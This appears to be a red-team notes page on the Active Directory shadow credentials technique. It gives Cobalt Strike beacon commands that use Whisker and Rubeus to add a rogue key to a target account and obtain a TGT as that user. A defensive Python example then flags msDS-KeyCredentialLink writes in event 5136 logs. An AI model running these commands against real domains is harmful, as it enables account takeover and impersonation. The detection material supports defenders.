When an account has shadow credentials configured, a client holding the corresponding key can obtain a TGT for that account. In other words, if an attacker has enough privileges over a target account to modify its DACL and add a shadow credential, they can obtain a TGT as that user.

The attack relies on the tool Whisker.

Attack Overview

  • Take note of any existing keys on target account.
  • Add malicious key to target account.
  • Use key to obtain TGT.
  • Remove only the malicious key from target after use.

# list existing keys
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:[target-account]

# add malicious key (record the base64-encoded certificate, its encryption password, and the deviceid)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /target:[target-account]

# get TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-account] /certificate:[cert-base64] /password:"[cert-password]" /nowrap

# remove only the added key (alternatively use `clear` to remove all keys)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:[target-account] /deviceid:[key-deviceid]
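From the defender's side, the sequence above leaves a trace: each Whisker add or remove is a write to the target's msDS-KeyCredentialLink attribute, which Windows logs as Security event 5136 when "Audit Directory Service Changes" and a Write Property SACL are in place. The script below is an added example, not part of the original page; it runs over constructed 5136 records and uses a constructed allow-list of accounts expected to write that attribute legitimately.

```python
# Added detection example (not from the original page): scan parsed Windows Security
# event 5136 records for writes to msDS-KeyCredentialLink. The sample events and the
# allow-list below are constructed for illustration.

ATTRIBUTE = "msDS-KeyCredentialLink"
# Operation type as rendered in the 5136 message, with the raw %%-codes mapped too.
OP_TYPES = {"%%14674": "Value Added", "%%14675": "Value Deleted",
            "Value Added": "Value Added", "Value Deleted": "Value Deleted"}
# Assumption: in this constructed environment only the device-registration
# service account writes the attribute legitimately.
ALLOWED_WRITERS = {"CORP\\AzureADKerberos$"}

def find_shadow_credential_writes(events, allowed_writers=ALLOWED_WRITERS, window_s=3600):
    """Return (severity, subject, target_dn, reason) tuples for suspicious writes.

    A lone add by a non-provisioning account is medium; an add followed by a
    delete of the same target by the same account within window_s is high,
    since that matches the add-key / use-key / remove-key sequence.
    """
    findings, pending_adds = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] != 5136 or ev["attribute"] != ATTRIBUTE:
            continue
        op = OP_TYPES.get(ev["operation"], ev["operation"])
        subj, target, t = ev["subject"], ev["object_dn"], ev["time"]
        if subj in allowed_writers:
            continue
        if op == "Value Added":
            pending_adds[target] = (subj, t)
            findings.append(("medium", subj, target, "key added by non-provisioning account"))
        elif op == "Value Deleted" and target in pending_adds:
            add_subj, add_t = pending_adds.pop(target)
            if add_subj == subj and t - add_t <= window_s:
                findings.append(("high", subj, target, "add then remove by same account within window"))
    return findings

# Constructed sample records (fields as a SIEM would parse them from 5136; time = epoch seconds).
SAMPLE_EVENTS = [
    {"event_id": 5136, "time": 1000, "subject": "CORP\\AzureADKerberos$", "object_dn": "CN=alice,CN=Users,DC=corp,DC=local", "attribute": ATTRIBUTE, "operation": "%%14674"},
    {"event_id": 5136, "time": 1200, "subject": "CORP\\bob", "object_dn": "CN=svc-web,CN=Users,DC=corp,DC=local", "attribute": ATTRIBUTE, "operation": "Value Added"},
    {"event_id": 5136, "time": 1300, "subject": "CORP\\bob", "object_dn": "CN=svc-web,CN=Users,DC=corp,DC=local", "attribute": "description", "operation": "Value Added"},
    {"event_id": 5136, "time": 1800, "subject": "CORP\\bob", "object_dn": "CN=svc-web,CN=Users,DC=corp,DC=local", "attribute": ATTRIBUTE, "operation": "%%14675"},
]

if __name__ == "__main__":
    for finding in find_shadow_credential_writes(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

Without the SACL on the user and computer objects the 5136 events are never generated, so confirm the audit policy before relying on this.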